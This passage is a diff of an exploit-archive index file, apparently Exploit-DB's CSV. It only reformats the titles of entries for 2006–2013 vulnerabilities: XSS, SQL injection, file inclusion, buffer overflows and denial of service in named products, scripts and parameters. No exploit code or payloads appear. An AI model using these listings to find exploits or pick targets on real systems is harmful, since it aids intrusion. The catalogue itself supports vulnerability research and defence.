Shop 5.2.2 Cat Parameter Cross-Site Scripting Vulnerability",2006-10-23,MC.Iglo,php,webapps,0 -28843,platforms/php/webapps/28843.txt,"cPanel 10.9 dosetmytheme theme Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0 +28843,platforms/php/webapps/28843.txt,"cPanel 10.9 DoSetmytheme theme Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 editzonetemplate template Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0 28845,platforms/php/webapps/28845.txt,"Shop-Script Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0 28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x Waka.PHP Multiple HTML-Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 @@ -25904,7 +25904,7 @@ id,file,description,date,author,platform,type,port 28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 Popup.PHP SQL Injection Vulnerability",2006-11-04,x23,php,webapps,0 28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 UFS Local Denial of Service Vulnerability",2006-11-04,LMH,solaris,dos,0 28912,platforms/linux/dos/28912.txt,"Linux Kernel 2.6.x ISO9660 Denial of Service Vulnerability",2006-11-05,LMH,linux,dos,0 -28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 Install.PHP3 Remote File Include Vulnerability",2006-11-06,Mahmood_ali,php,webapps,0 +28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 Install.PHP3 - Remote File Include Vulnerability",2006-11-06,Mahmood_ali,php,webapps,0 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 NewList.PHP Cross-Site Scripting Vulnerability",2006-11-06,CvIr.System,php,webapps,0 28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 RSS.PHP SQL Injection Vulnerability",2006-11-06,Liz0ziM,php,webapps,0 28916,platforms/windows/remote/28916.rb,"America Online ICQ 5.1 ActiveX Control Remote Code Execution Vulnerability",2006-11-06,"Peter Vreugdenhil",windows,remote,0 @@ -26006,7 +26006,7 @@ id,file,description,date,author,platform,type,port 29015,platforms/asp/webapps/29015.txt,"Car Site Manager csm/asp/detail.asp p Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29016,platforms/asp/webapps/29016.txt,"Car Site Manager csm/asp/listings.asp Multiple Parameter XSS",2006-11-14,"laurent gaffie",asp,webapps,0 29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - get_password.php XSS",2006-11-14,"David Vieira-Kurz",php,webapps,0 -29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 XSS",2006-11-14,"David Vieira-Kurz",php,webapps,0 +29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 - XSS",2006-11-14,"David Vieira-Kurz",php,webapps,0 29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0 29020,platforms/php/webapps/29020.txt,"Quick Paypal Payments 3.0 - Presistant XSS (0day)",2013-10-17,Zy0d0x,php,webapps,80 29021,platforms/php/webapps/29021.txt,"Wordpress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 @@ -26019,20 +26019,20 @@ id,file,description,date,author,platform,type,port 29029,platforms/asp/webapps/29029.txt,"MGinternet Property Site Manager detail.asp p Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29030,platforms/asp/webapps/29030.txt,"MGinternet Property Site Manager listings.asp Multiple Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29031,platforms/asp/webapps/29031.txt,"MGinternet Property Site Manager admin_login.asp Multiple Field SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 -29032,platforms/windows/remote/29032.txt,"Conxint FTP 2.2.603 Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",windows,remote,0 +29032,platforms/windows/remote/29032.txt,"Conxint FTP 2.2.603 - Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",windows,remote,0 29033,platforms/linux/remote/29033.html,"Links, ELinks 'smbclient' Remote Command Execution Vulnerability",2006-11-18,"Teemu Salmela",linux,remote,0 29034,platforms/multiple/webapps/29034.txt,"Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities",2013-10-18,Vulnerability-Lab,multiple,webapps,0 29035,platforms/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow",2013-10-18,Asesino04,windows,remote,0 29036,platforms/windows/dos/29036.pl,"Teamtek Universal FTP Server Multiple Commands Remote Denial of Service Vulnerabilities",2006-11-15,"Praveen Darhanam",windows,dos,0 29037,platforms/asp/webapps/29037.txt,"CandyPress Store 3.5.2 14 openPolicy.asp policy Parameter SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 29038,platforms/asp/webapps/29038.txt,"CandyPress Store 3.5.2 14 prodList.asp brand Parameter SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 -29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x Remote LDAP Denial of Service Vulnerability",2006-11-15,"Evgeny Legerov",windows,dos,0 +29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service Vulnerability",2006-11-15,"Evgeny Legerov",windows,dos,0 29040,platforms/asp/webapps/29040.txt,"High Performance Computers Solutions Shopping Cart Multiple SQL Injection Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 -29041,platforms/asp/webapps/29041.txt,"Yetihost Helm 3.2.10 Multiple Cross-Site Scripting Vulnerabilities",2006-11-15,"Aria-Security Team",asp,webapps,0 +29041,platforms/asp/webapps/29041.txt,"Yetihost Helm 3.2.10 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-15,"Aria-Security Team",asp,webapps,0 29042,platforms/asp/webapps/29042.txt,"Dragon Internet Events Listing 2.0.01 venue_detail.asp VenueID Parameter SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 29043,platforms/asp/webapps/29043.txt,"Dragon Internet Events Listing 2.0.01 event_searchdetail.asp ID Parameter SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 29044,platforms/asp/webapps/29044.txt,"Dragon Internet Events Listing 2.0.01 admin_login.asp Multiple Field SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 -29045,platforms/windows/remote/29045.txt,"Selenium Web Server 1.0 XSS",2006-11-15,"Greg Linares",windows,remote,0 +29045,platforms/windows/remote/29045.txt,"Selenium Web Server 1.0 - XSS",2006-11-15,"Greg Linares",windows,remote,0 29046,platforms/asp/webapps/29046.txt,"ASPIntranet 2.1 Mutiple SQL Injection Vulnerabilities",2006-11-15,"Aria-Security Team",asp,webapps,0 29047,platforms/php/webapps/29047.txt,"Hot Links Perl PHP Information Disclosure Vulnerability",2006-11-15,hack2prison,php,webapps,0 29048,platforms/asp/webapps/29048.txt,"i-Gallery 3.4 igallery.asp Multiple Parameter XSS",2006-11-16,"Aria-Security Team",asp,webapps,0 @@ -26049,7 +26049,7 @@ id,file,description,date,author,platform,type,port 29059,platforms/php/webapps/29059.txt,"PhpMyAdmin 2.x db_operations.php Multiple Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 29060,platforms/php/webapps/29060.txt,"PhpMyAdmin 2.x querywindow.php Multiple Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 29061,platforms/php/webapps/29061.txt,"PhpMyAdmin 2.x sql.php pos Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 -29062,platforms/php/webapps/29062.txt,"phpMyAdmin 2.x Multiple Script Array Handling Path Disclosure",2006-09-15,"laurent gaffie",php,webapps,0 +29062,platforms/php/webapps/29062.txt,"phpMyAdmin 2.x - Multiple Script Array Handling Path Disclosure",2006-09-15,"laurent gaffie",php,webapps,0 29063,platforms/asp/webapps/29063.txt,"Xtreme ASP Photo Gallery 2.0 displaypic.asp sortorder Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29064,platforms/asp/webapps/29064.txt,"Xtreme ASP Photo Gallery 2.0 displaypic.asp catname Parameter XSS",2006-11-16,"Aria-Security Team",asp,webapps,0 29065,platforms/php/webapps/29065.txt,"WHMCS 5.2.8 - SQL Injection Vulnerability",2013-10-19,g00n,php,webapps,0 @@ -26061,7 +26061,7 @@ id,file,description,date,author,platform,type,port 29073,platforms/asp/webapps/29073.txt,"ASPCart 4.5 - Multiple SQL Injection Vulnerabilities",2006-11-17,"laurent gaffie",asp,webapps,0 29074,platforms/asp/webapps/29074.txt,"20/20 Real Estate 3.2 - Multiple SQL Injection Vulnerabilities",2006-11-17,"laurent gaffie",asp,webapps,0 29075,platforms/asp/webapps/29075.txt,"20/20 Auto Gallery 3.2 - Multiple SQL Injection Vulnerabilities",2006-11-17,"laurent gaffie",asp,webapps,0 -29076,platforms/windows/dos/29076.html,"Adobe Reader 7.0.x Multiple Vulnerabilities",2006-11-17,"Michal Bucko",windows,dos,0 +29076,platforms/windows/dos/29076.html,"Adobe Reader 7.0.x - Multiple Vulnerabilities",2006-11-17,"Michal Bucko",windows,dos,0 29077,platforms/asp/webapps/29077.txt,"20/20 Applications Data Shed 1.0 f-email.asp itemID Parameter SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29078,platforms/asp/webapps/29078.txt,"20/20 Applications Data Shed 1.0 listings.asp Multiple Parameter SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29079,platforms/php/webapps/29079.txt,"VBulletin 3.6.x Admin Control Panel Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 @@ -26113,14 +26113,14 @@ id,file,description,date,author,platform,type,port 29127,platforms/hardware/remote/29127.rb,"D-Link DIR-605L Captcha Handling Buffer Overflow",2013-10-22,metasploit,hardware,remote,80 29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 29129,platforms/windows/remote/29129.rb,"Interactive Graphical SCADA System Remote Command Injection",2013-10-22,metasploit,windows,remote,12397 -29130,platforms/windows/remote/29130.rb,"HP Intelligent Management Center BIMS UploadServlet Directory Traversal",2013-10-22,metasploit,windows,remote,8080 +29130,platforms/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet Directory Traversal",2013-10-22,metasploit,windows,remote,8080 29131,platforms/hardware/webapps/29131.rb,"ARRIS DG860A NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",hardware,webapps,80 29132,platforms/unix/remote/29132.rb,"WebTester 5.x Command Execution",2013-10-22,metasploit,unix,remote,80 29133,platforms/asp/webapps/29133.txt,"Rapid Classified 3.1 viewad.asp id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29134,platforms/asp/webapps/29134.txt,"Rapid Classified 3.1 view_print.asp id Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 search.asp SH1 Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 reply.asp Multiple Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 -29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 advsearch.asp dosearch Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 +29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 advsearch.asp DoSearch Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29141,platforms/asp/webapps/29141.txt,"The Classified Ad System 3.0 default.asp Multiple Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 search_listing.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 detail.asp property_id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -26140,7 +26140,7 @@ id,file,description,date,author,platform,type,port 29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 rss.php rss_title Parameter XSS",2006-11-21,"Alireza Hassani",php,webapps,0 29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x GNUTYPE_NAMES Remote Directory Traversal Vulnerability",2006-11-21,"Teemu Salmela",linux,remote,0 29161,platforms/osx/dos/29161.txt,"Apple Mac OS X 10.4.8 UDTO Disk Image Remote Denial of Service Vulnerability",2006-11-21,LMH,osx,dos,0 -29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 0 Weblog.php Cross-Site Scripting Vulnerability",2006-11-21,the_Edit0r,php,webapps,0 +29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting Vulnerability",2006-11-21,the_Edit0r,php,webapps,0 29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0 & 10.0.305.0 - Kernel Driver (fortknoxfw.sys) Memory Corruption Vulnerability",2013-10-24,"Arash Allebrahim",windows,dos,0 29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 ticketview.php Multiple Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0 29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 ticket.php email Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0 @@ -26153,8 +26153,8 @@ id,file,description,date,author,platform,type,port 29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 System SP_Index.PHP Cross-Site Scripting Vulnerability",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29176,platforms/asp/webapps/29176.txt,"ASP ListPics 5.0 Listpics.ASP SQL Injection Vulnerability",2006-11-24,"Aria-Security Team",asp,webapps,0 29177,platforms/php/webapps/29177.txt,"MMGallery 1.55 Thumbs.PHP Cross-Site Scripting Vulnerability",2006-11-24,"Al7ejaz Hacker",php,webapps,0 -29178,platforms/asp/webapps/29178.txt,"Fixit iDMS Pro Image Gallery filelist.asp Multiple Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 -29179,platforms/asp/webapps/29179.txt,"Fixit iDMS Pro Image Gallery showfile.asp fid Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 +29178,platforms/asp/webapps/29178.txt,"Fixit iDms Pro Image Gallery filelist.asp Multiple Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 +29179,platforms/asp/webapps/29179.txt,"Fixit iDms Pro Image Gallery showfile.asp fid Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29180,platforms/asp/webapps/29180.txt,"SIAP CMS Login.ASP SQL Injection Vulnerability",2006-11-25,nagazakig74,asp,webapps,0 29181,platforms/php/webapps/29181.txt,"CPanel 11 Beta Multiple Cross-Site Scripting Vulnerabilities",2006-11-25,"Aria-Security Team",php,webapps,0 29182,platforms/php/webapps/29182.txt,"cPanel WebHost Manager 3.1 dochangeemail email Parameter XSS",2006-11-25,"Aria-Security Team",php,webapps,0 @@ -26241,7 +26241,7 @@ id,file,description,date,author,platform,type,port 29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability",2013-10-29,"Marcela Benetrix",php,webapps,80 29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 SurgeFTPMGR.CGI Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 ProductDetails.ASP SQL Injection Vulnerability",2006-12-11,ajann,asp,webapps,0 -29277,platforms/windows/remote/29277.txt,"winamp web interface 7.5.13 Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 +29277,platforms/windows/remote/29277.txt,"winamp web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.PHP Remote File Include Vulnerability",2006-12-13,the_Edit0r,php,webapps,0 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0 @@ -26439,14 +26439,14 @@ id,file,description,date,author,platform,type,port 29484,platforms/php/webapps/29484.txt,"Indexu 5.0/5.3 search.php keyword Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29485,platforms/php/webapps/29485.txt,"Indexu 5.0/5.3 register.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29486,platforms/php/webapps/29486.txt,"Indexu 5.0/5.3 power_search.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 -29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 new.php multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 +29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 new.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 mailing_list.php Multiple Variables XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 login.php error_msg Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 -29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal information disclosure vulnerability",2007-01-17,DPR,windows,remote,0 +29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal information disclosure Vulnerability",2007-01-17,DPR,windows,remote,0 29491,platforms/php/webapps/29491.txt,"myBloggie 2.1.5 index.php PATH_INFO Parameter XSS",2007-01-17,CorryL,php,webapps,0 29492,platforms/php/webapps/29492.txt,"myBloggie 2.1.5 login.php PATH_INFO Parameter XSS",2007-01-17,CorryL,php,webapps,0 29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 Index.PHP Cross-Site Scripting Vulnerability",2007-01-18,CorryL,php,webapps,0 -29496,platforms/linux/remote/29496.txt,"ArsDigita Community System 3.4.x Directory Traversal Vulnerability",2007-01-18,"Elliot Kendall",linux,remote,0 +29496,platforms/linux/remote/29496.txt,"ArsDigita Community System 3.4.x - Directory Traversal Vulnerability",2007-01-18,"Elliot Kendall",linux,remote,0 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 29499,platforms/php/webapps/29499.txt,"SMF 1.1 Index.PHP HTML Injection Vulnerability",2007-01-20,"Aria-Security Team",php,webapps,0 @@ -26488,7 +26488,7 @@ id,file,description,date,author,platform,type,port 29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 'common_foot.php' Remote File Include Vulnerability",2007-01-30,Tr_ZiNDaN,php,webapps,0 29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 ICMP Unspecified Remote Denial of Service Vulnerability",2007-01-30,kcope,solaris,dos,0 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation Vulnerability",2013-11-12,"Sense of Security",php,webapps,0 -29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow(DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0 +29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 @@ -26510,8 +26510,8 @@ id,file,description,date,author,platform,type,port 29565,platforms/php/webapps/29565.txt,"PortailPHP 2 mod_news/goodies.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29566,platforms/php/webapps/29566.txt,"PortailPHP 2 mod_search/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 User_Agent Error Page Cross-Site Scripting Vulnerability",2007-02-05,digi7al64,cfm,webapps,0 -29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 Multiple Remote And Local File Include Vulnerabilities",2007-02-05,anonymous,php,webapps,0 -29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine Affichearticles.PHP3 Remote File Include Vulnerability",2007-02-06,Blaster,php,webapps,0 +29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Remote And Local File Include Vulnerabilities",2007-02-05,anonymous,php,webapps,0 +29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine Affichearticles.PHP3 - Remote File Include Vulnerability",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Change Admin Password CSRF Vulnerability",2013-11-13,"Hubert Gradek",hardware,webapps,0 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 System Control Panel CronJob Arbitrary Code Execution Vulnerability",2007-02-07,"Daniel Schulte",php,webapps,0 29572,platforms/php/webapps/29572.txt,"CPanel <= 11 PassWDMySQL Cross-Site Scripting Vulnerability",2007-02-08,s3rv3r_hack3r,php,webapps,0 @@ -26632,7 +26632,7 @@ id,file,description,date,author,platform,type,port 29691,platforms/linux/remote/29691.py,"Gnome Evolution 2.x GnuPG Arbitrary Content Injection Vulnerability",2007-03-05,"Gerardo Richarte",linux,remote,0 29692,platforms/php/dos/29692.txt,"PHP 3/4/5 ZendEngine Variable Destruction Remote Denial of Service Vulnerability",2007-03-01,"Stefan Esser",php,dos,0 29693,platforms/php/dos/29693.txt,"PHP 4/5 Executor Deep Recursion Remote Denial of Service Vulnerability",2007-03-01,"Maksymilian Arciemowicz",php,dos,0 -29694,platforms/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 Index.PHP SQL injection Vulnerability",2007-03-01,Samenspender,php,webapps,0 +29694,platforms/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 Index.PHP SQL Injection Vulnerability",2007-03-01,Samenspender,php,webapps,0 29695,platforms/windows/local/29695.txt,"Comodo Firewall Pro 2.4.x - Local Protection Mechanism Bypass Vulnerability",2007-03-01,"Matousec Transparent security",windows,local,0 29696,platforms/php/webapps/29696.txt,"aWebNews 1.1 listing.php path_to_news Parameter Remote File Inclusion",2007-03-01,mostafa_ragab,php,webapps,0 29697,platforms/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog news.php Multiple Parameter XSS",2007-03-01,the_Edit0r,php,webapps,0 @@ -26659,7 +26659,7 @@ id,file,description,date,author,platform,type,port 29723,platforms/linux/dos/29723.txt,"Mozilla Firefox 2.0.0.2 - Unspecified GIF Handling Denial of Service Vulnerability",2007-03-09,Samuel,linux,dos,0 29724,platforms/linux/dos/29724.txt,"MySQL 5.0.x Single Row SubSelect Remote Denial of Service Vulnerability",2007-03-09,S.Streichsbier,linux,dos,0 29725,platforms/openbsd/remote/29725.py,"OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow Vulnerability",2007-03-09,"Alfredo Ortega",openbsd,remote,0 -29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti Goster.ASP SQL injection Vulnerability",2007-03-09,Cr@zy_King,asp,webapps,0 +29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti Goster.ASP SQL Injection Vulnerability",2007-03-09,Cr@zy_King,asp,webapps,0 29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 includes/functions_kb.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29728,platforms/php/webapps/29728.txt,"Premod SubDog 2 includes/themen_portal_mitte.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29729,platforms/php/webapps/29729.txt,"Premod SubDog 2 includes/logger_engine.php phpbb_root_path Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 @@ -26672,7 +26672,7 @@ id,file,description,date,author,platform,type,port 29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 ADODB-Connection.Inc.PHP Remote File Include Vulnerability",2007-03-12,"RaeD Hasadya",php,webapps,0 29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 Check_Vote.PHP Local File Include Vulnerability",2007-03-13,"BorN To K!LL",php,webapps,0 29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS) Vulnerability",2007-03-13,"Michal Majchrowicz",windows,dos,0 -29739,platforms/linux/remote/29739.txt,"Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability",2007-03-14,"D. Matscheko",linux,remote,0 +29739,platforms/linux/remote/29739.txt,"Apache HTTP Server Tomcat 5.x/6.0.x - Directory Traversal Vulnerability",2007-03-14,"D. Matscheko",linux,remote,0 29740,platforms/windows/dos/29740.txt,"MiniGZip Controls File_Compress Buffer Overflow Vulnerability",2007-03-14,starcadi,windows,dos,0 29741,platforms/windows/remote/29741.txt,"Microsoft Internet Explorer 7.0 NavCancel.HTM Cross-Site Scripting Vulnerability",2007-03-14,"Aviv Raff",windows,remote,0 29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail <= 4.0.4 Client Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 @@ -26722,7 +26722,7 @@ id,file,description,date,author,platform,type,port 29788,platforms/php/remote/29788.php,"PHP <= 4.4.4 Zip_Entry_Read() Integer Overflow Vulnerability",2007-03-27,"Stefan Esser",php,remote,0 29789,platforms/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,php,webapps,0 29790,platforms/php/webapps/29790.JPG,"ImpressPages CMS 3.8 - Stored XSS Vulnerability",2013-11-23,sajith,php,webapps,0 -29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - Crash POC (.wav)",2013-11-23,"Akin Tosunlar",windows,dos,0 +29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - Crash PoC (.wav)",2013-11-23,"Akin Tosunlar",windows,dos,0 29794,platforms/hardware/webapps/29794.txt,"Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability",2013-11-24,"Sebastián Magof",hardware,webapps,0 29795,platforms/hardware/webapps/29795.pl,"Pirelli Discus DRG A125g - Local Password Disclosure Vulnerability",2013-11-24,"Sebastián Magof",hardware,webapps,0 29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password Vulnerability",2013-11-24,"Sebastián Magof",hardware,webapps,0 @@ -26748,7 +26748,7 @@ id,file,description,date,author,platform,type,port 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 BMP Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 Fotokategori.ASP SQL Injection Vulnerability",2007-04-04,CoNqUeRoR,asp,webapps,0 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 -29819,platforms/windows/dos/29819.c,"IrfanView 3.99 Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 +29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29820,platforms/multiple/remote/29820.html,"Firebug 1.03 Rep.JS Script Code Injection Vulnerability",2007-03-06,"Thor Larholm",multiple,remote,0 29821,platforms/php/webapps/29821.txt,"Livor 2.5 Index.PHP Cross-Site Scripting Vulnerability",2007-04-06,"Arham Muhammad",php,webapps,0 29822,platforms/linux/local/29822.c,"Man Command -H Flag Local Buffer Overflow Vulnerability",2007-04-06,"Daniel Roethlisberger",linux,local,0 @@ -26778,7 +26778,7 @@ id,file,description,date,author,platform,type,port 29849,platforms/php/webapps/29849.html,"ToendaCMS 1.5.3 HTTP Get And Post Forms HTML Injection Vulnerability",2007-04-12,"Hanno Boeck",php,webapps,0 29850,platforms/windows/dos/29850.txt,"eIQnetworks Enterprise Security Analyzer 2.5 - Multiple Buffer Overflow Vulnerabilities",2007-04-12,"Leon Juranic",windows,dos,0 29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 Check_login.ASP Cross-Site Scripting Vulnerability",2007-04-13,"David Vieira-Kurz",php,webapps,0 -29852,platforms/php/webapps/29852.txt,"Doop Content Management System 1.3.x Multiple Input Validation Vulnerabilities",2007-04-13,KaBuS,php,webapps,0 +29852,platforms/php/webapps/29852.txt,"Doop Content Management System 1.3.x - Multiple Input Validation Vulnerabilities",2007-04-13,KaBuS,php,webapps,0 29853,platforms/windows/remote/29853.rb,"LanDesk Management Suite 8.7 Alert Service 